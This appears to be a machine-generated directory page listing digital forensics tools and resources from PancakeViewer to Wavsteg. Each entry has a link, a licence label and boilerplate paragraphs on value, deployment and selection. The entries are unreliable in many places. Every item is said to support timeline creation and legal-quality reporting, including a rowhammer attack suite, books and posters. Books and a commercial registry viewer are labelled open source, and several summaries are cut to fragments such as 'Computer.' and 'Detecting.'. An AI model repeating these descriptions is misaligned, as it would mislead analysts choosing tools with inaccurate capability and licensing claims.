What it does: OpenRelik is used in digital forensics & DFIR programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: Forensic platform to store file artifacts and run workflows.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Forensics > Tools > Frameworks.

Back to Name Jump

osquery

  • Website: https://github.com/osquery/osquery
  • Model: Open Source
  • Category: Digital Forensics & DFIR
  • Source Lists: Awesome Forensics

What it does: osquery is used in digital forensics & DFIR programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: SQL-powered operating system analytics.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Forensics > Tools > Live Forensics.

Back to Name Jump

OSX Collect

  • Website: https://github.com/YelpArchive/osxcollector
  • Model: Open Source
  • Category: Digital Forensics & DFIR
  • Source Lists: Awesome Forensics

What it does: OSX Collect is used in digital forensics & DFIR programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: Source list entry describing this security tool and its use case.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Forensics > Tools > OS X Forensics.

Back to Name Jump

Letter P

This letter section contains 8 tools.

PancakeViewer

  • Website: https://github.com/forensicmatt/PancakeViewer
  • Model: Open Source
  • Category: Digital Forensics & DFIR
  • Source Lists: Awesome Forensics

What it does: PancakeViewer is used in digital forensics & DFIR programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: Disk image viewer based on dfvfs, similar to the FTK Imager viewer.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Forensics > Tools > Disk image handling.

Back to Name Jump

PCILeech

  • Website: https://github.com/ufrisk/pcileech
  • Model: Open Source
  • Category: Digital Forensics & DFIR
  • Source Lists: Awesome Penetration Testing

What it does: PCILeech is used in digital forensics & DFIR programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: Uses PCIe hardware devices to read and write from the target system memory via Direct Memory Access (DMA) over PCIe.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Penetration Testing > Physical Access Tools.

Back to Name Jump

PDF Streams Inflater

  • Website: http://malzilla.sourceforge.net/downloads.html
  • Model: Open Source
  • Category: Digital Forensics & DFIR
  • Source Lists: Awesome CTF

What it does: PDF Streams Inflater is used in digital forensics & DFIR programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: Finds and extracts zlib-compressed streams from PDF files.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Solve > Forensics.

Back to Name Jump

photorec

  • Website: https://www.cgsecurity.org/wiki/PhotoRec
  • Model: Open Source
  • Category: Digital Forensics & DFIR
  • Source Lists: Awesome Forensics

What it does: photorec is used in digital forensics & DFIR programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: File carving tool.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Forensics > Tools > Carving.

Back to Name Jump

Pngcheck

  • Website: http://www.libpng.org/pub/png/apps/pngcheck.html
  • Model: Open Source
  • Category: Digital Forensics & DFIR
  • Source Lists: Awesome CTF

What it does: Pngcheck is used in digital forensics & DFIR programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: Verifies the integrity of PNG files and dumps all of the chunk-level information in human-readable form.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Solve > Forensics.

Back to Name Jump

Precision Widgets of North Dakota Intrusion

  • Website: https://betweentwodfirns.blogspot.com/2017/11/dfir-ctf-precision-widgets-of-north.html
  • Model: Open Source
  • Category: Digital Forensics & DFIR
  • Source Lists: Awesome Forensics

What it does: Precision Widgets of North Dakota Intrusion is used in digital forensics & DFIR programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: Source list entry describing this security tool and its use case.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Forensics > Learn Forensics > CTFs and Challenges.

Back to Name Jump

PyShadow

  • Website: https://github.com/alicangnll/pyshadow
  • Model: Open Source
  • Category: Digital Forensics & DFIR
  • Source Lists: Awesome Forensics

What it does: PyShadow is used in digital forensics & DFIR programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: A library for Windows to read shadow copies, delete shadow copies, create symbolic links to shadow copies, and create shadow copies.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Forensics > Tools > Windows Artifacts.

Back to Name Jump

python-ntfs

  • Website: https://github.com/williballenthin/python-ntfs
  • Model: Open Source
  • Category: Digital Forensics & DFIR
  • Source Lists: Awesome Forensics

What it does: python-ntfs is used in digital forensics & DFIR programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: NTFS analysis.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Forensics > Tools > Windows Artifacts > NTFS/MFT Processing.

Back to Name Jump

Letter R

This letter section contains 7 tools.

Real Digital Forensics

  • Website: https://www.amzn.com/dp/0321240693
  • Model: Open Source
  • Category: Digital Forensics & DFIR
  • Source Lists: Awesome Malware Analysis

What it does: Real Digital Forensics is used in digital forensics & DFIR programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: Computer.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Resources > Books.

Back to Name Jump

RecuperaBit

  • Website: https://github.com/Lazza/RecuperaBit
  • Model: Open Source
  • Category: Digital Forensics & DFIR
  • Source Lists: Awesome Forensics

What it does: RecuperaBit is used in digital forensics & DFIR programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: Reconstruct and recover NTFS data.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Forensics > Tools > Windows Artifacts > NTFS/MFT Processing.

Registry Dumper

  • Website: http://www.kahusecurity.com/posts/registry_dumper_find_and_dump_hidden_registry_keys.html
  • Model: Open Source
  • Category: Digital Forensics & DFIR
  • Source Lists: Awesome CTF

What it does: Registry Dumper is used in digital forensics & DFIR programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: Dump your registry.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Create > Forensics.

Registry Viewer®

  • Website: https://accessdata.com/product-download/registry-viewer-2-0-0
  • Model: Open Source
  • Category: Digital Forensics & DFIR
  • Source Lists: Awesome CTF

What it does: Registry Viewer® is used in digital forensics & DFIR programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: Used to view Windows registries.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Solve > Forensics.

RegRippy

  • Website: https://github.com/airbus-cert/regrippy
  • Model: Open Source
  • Category: Digital Forensics & DFIR
  • Source Lists: Awesome Forensics

What it does: RegRippy is used in digital forensics & DFIR programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: A framework for reading and extracting useful forensics data from Windows registry hives.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Forensics > Tools > Windows Artifacts.

ResourcesExtract

  • Website: http://www.nirsoft.net/utils/resources_extract.html
  • Model: Open Source
  • Category: Digital Forensics & DFIR
  • Source Lists: Awesome CTF

What it does: ResourcesExtract is used in digital forensics & DFIR programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: Extract various filetypes from exes.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Solve > Forensics.

ReverseEngineering Challenges

  • Website: https://challenges.re
  • Model: Open Source
  • Category: Digital Forensics & DFIR
  • Source Lists: Awesome Forensics

What it does: ReverseEngineering Challenges is used in digital forensics & DFIR programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: Source list entry describing this security tool and its use case.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Forensics > Learn Forensics > CTFs and Challenges.

Letter S

This letter section contains 11 tools.

SANS Digital Forensics

  • Website: https://www.sans.org/cybersecurity-focus-areas/digital-forensics-incident-response
  • Model: Open Source
  • Category: Digital Forensics & DFIR
  • Source Lists: Awesome Forensics

What it does: SANS Digital Forensics is used in digital forensics & DFIR programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: Source list entry describing this security tool and its use case.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Forensics > Resources > Web.

SANS Investigative Forensics Toolkit (sift)

  • Website: https://github.com/teamdfir/sift
  • Model: Open Source
  • Category: Digital Forensics & DFIR
  • Source Lists: Awesome Forensics

What it does: SANS Investigative Forensics Toolkit (sift) is used in digital forensics & DFIR programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: Linux distribution for forensic analysis.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Forensics > Tools > Distributions.

SANS Posters

  • Website: https://www.sans.org/posters
  • Model: Open Source
  • Category: Digital Forensics & DFIR
  • Source Lists: Awesome Forensics

What it does: SANS Posters is used in digital forensics & DFIR programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: Free posters provided by SANS.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Forensics > Resources > Other.

Shellbags

  • Website: https://github.com/williballenthin/shellbags
  • Model: Open Source
  • Category: Digital Forensics & DFIR
  • Source Lists: Awesome CTF

What it does: Shellbags is used in digital forensics & DFIR programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: Investigate NTUSER.DAT files.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Solve > Forensics.

sherloq

  • Website: https://github.com/GuidoBartoli/sherloq
  • Model: Open Source
  • Category: Digital Forensics & DFIR
  • Source Lists: Awesome Forensics

What it does: sherloq is used in digital forensics & DFIR programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: An open-source digital photographic image forensic toolset.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Forensics > Tools > Picture Analysis.

sleuthkit

  • Website: https://github.com/sleuthkit/sleuthkit
  • Model: Open Source
  • Category: Digital Forensics & DFIR
  • Source Lists: Awesome Hacking, Awesome Forensics

What it does: sleuthkit is used in digital forensics & DFIR programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: A library and collection of command-line digital forensics tools.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Forensics > Tools > Frameworks.

Snow

  • Website: https://sbmlabs.com/notes/snow_whitespace_steganography_tool
  • Model: Open Source
  • Category: Digital Forensics & DFIR
  • Source Lists: Awesome CTF

What it does: Snow is used in digital forensics & DFIR programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: A Whitespace Steganography Tool.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Solve > Forensics.

Social Engineering

  • Website: https://github.com/giuliacassara/awesome-social-engineering
  • Model: Open Source
  • Category: Digital Forensics & DFIR
  • Source Lists: Awesome Forensics

What it does: Social Engineering is used in digital forensics & DFIR programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: Source list entry describing this security tool and its use case.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Forensics > Related Awesome Lists.

Sonicvisualizer

  • Website: https://www.sonicvisualiser.org
  • Model: Open Source
  • Category: Digital Forensics & DFIR
  • Source Lists: Awesome Forensics

What it does: Sonicvisualizer is used in digital forensics & DFIR programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: Source list entry describing this security tool and its use case.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Forensics > Tools > Steganography.

Steghide

  • Website: https://github.com/StegHigh/steghide
  • Model: Open Source
  • Category: Digital Forensics & DFIR
  • Source Lists: Awesome Forensics

What it does: Steghide is used in digital forensics & DFIR programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: A steganography program that hides data in various kinds of image and audio files.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Forensics > Tools > Steganography.

swap_digger

  • Website: https://github.com/sevagas/swap_digger
  • Model: Open Source
  • Category: Digital Forensics & DFIR
  • Source Lists: Awesome Forensics

What it does: swap_digger is used in digital forensics & DFIR programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: A bash script used to automate Linux swap analysis, automating swap extraction and searches for Linux user credentials, Web form credentials, Web form emails, etc.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Forensics > Tools > Carving.

Letter T

This letter section contains 7 tools.

The Art of Memory Forensics

  • Website: https://amzn.com/dp/1118825098
  • Model: Open Source
  • Category: Digital Forensics & DFIR
  • Source Lists: Awesome Malware Analysis

What it does: The Art of Memory Forensics is used in digital forensics & DFIR programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: Detecting.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Resources > Books.

This Week In 4n6

  • Website: https://thisweekin4n6.com/
  • Model: Open Source
  • Category: Digital Forensics & DFIR
  • Source Lists: Awesome Forensics

What it does: This Week In 4n6 is used in digital forensics & DFIR programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: Weekly updates for forensics.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Forensics > Resources > Blogs.

Timeline Explorer

  • Website: https://binaryforay.blogspot.com/2017/04/introducing-timeline-explorer-v0400.html
  • Model: Open Source
  • Category: Digital Forensics & DFIR
  • Source Lists: Awesome Forensics

What it does: Timeline Explorer is used in digital forensics & DFIR programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: Timeline Analysis tool for CSV and Excel files. Built for SANS FOR508 students.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Forensics > Tools > Timeline Analysis.

timeliner

  • Website: https://github.com/airbus-cert/timeliner
  • Model: Open Source
  • Category: Digital Forensics & DFIR
  • Source Lists: Awesome Forensics

What it does: timeliner is used in digital forensics & DFIR programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: A rewrite of mactime, a bodyfile reader.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Forensics > Tools > Timeline Analysis.

TriageHasher

  • Website: https://github.com/FlipForensics/TriageHasher
  • Model: Open Source
  • Category: Digital Forensics & DFIR
  • Source Lists: Awesome Forensics

What it does: TriageHasher is used in digital forensics & DFIR programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: A flexible hashing tool designed for triage collections on Windows, Linux and MacOS. Only hash files with a given extension and location.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Forensics > Tools > Acquisition.

TRRespass

  • Website: https://github.com/vusec/trrespass
  • Model: Open Source
  • Category: Digital Forensics & DFIR
  • Source Lists: Awesome Penetration Testing

What it does: TRRespass is used in digital forensics & DFIR programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: Many-sided rowhammer tool suite able to reverse engineer the contents of DDR3 and DDR4 memory chips protected by Target Row Refresh mitigations.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Penetration Testing > Side-channel Tools.

turbinia

  • Website: https://github.com/google/turbinia
  • Model: Open Source
  • Category: Digital Forensics & DFIR
  • Source Lists: Awesome Forensics

What it does: turbinia is used in digital forensics & DFIR programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: Turbinia is an open-source framework for deploying, managing, and running forensic workloads on cloud platforms.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Forensics > Tools > Frameworks.

Letter U

This letter section contains 4 tools.

UFADE

  • Website: https://github.com/prosch88/UFADE
  • Model: Open Source
  • Category: Digital Forensics & DFIR
  • Source Lists: Awesome Forensics

What it does: UFADE is used in digital forensics & DFIR programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: Extract files from iOS devices on Linux and MacOS. Mostly a wrapper for pymobiledevice3. Creates iTunes-style backups and advanced logical backups.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Forensics > Tools > Acquisition.

unfurl

  • Website: https://github.com/obsidianforensics/unfurl
  • Model: Open Source
  • Category: Digital Forensics & DFIR
  • Source Lists: Awesome Forensics

What it does: unfurl is used in digital forensics & DFIR programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: Extract and visualize data from URLs.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Forensics > Tools > Internet Artifacts.

unix_collector

  • Website: https://github.com/op7ic/unix_collector
  • Model: Open Source
  • Category: Digital Forensics & DFIR
  • Source Lists: Awesome Forensics

What it does: unix_collector is used in digital forensics & DFIR programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: A live forensic collection script for UNIX-like systems as a single script.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Forensics > Tools > Acquisition.

USBRip

  • Website: https://github.com/snovvcrash/usbrip
  • Model: Open Source
  • Category: Digital Forensics & DFIR
  • Source Lists: Awesome CTF

What it does: USBRip is used in digital forensics & DFIR programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: Simple CLI forensics tool for tracking USB device artifacts (history of USB events) on GNU/Linux.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Solve > Forensics.

Letter W

This letter section contains 5 tools.

Wavsteg

  • Website: https://github.com/samolds/wavsteg
  • Model: Open Source
  • Category: Digital Forensics & DFIR
  • Source Lists: Awesome Forensics

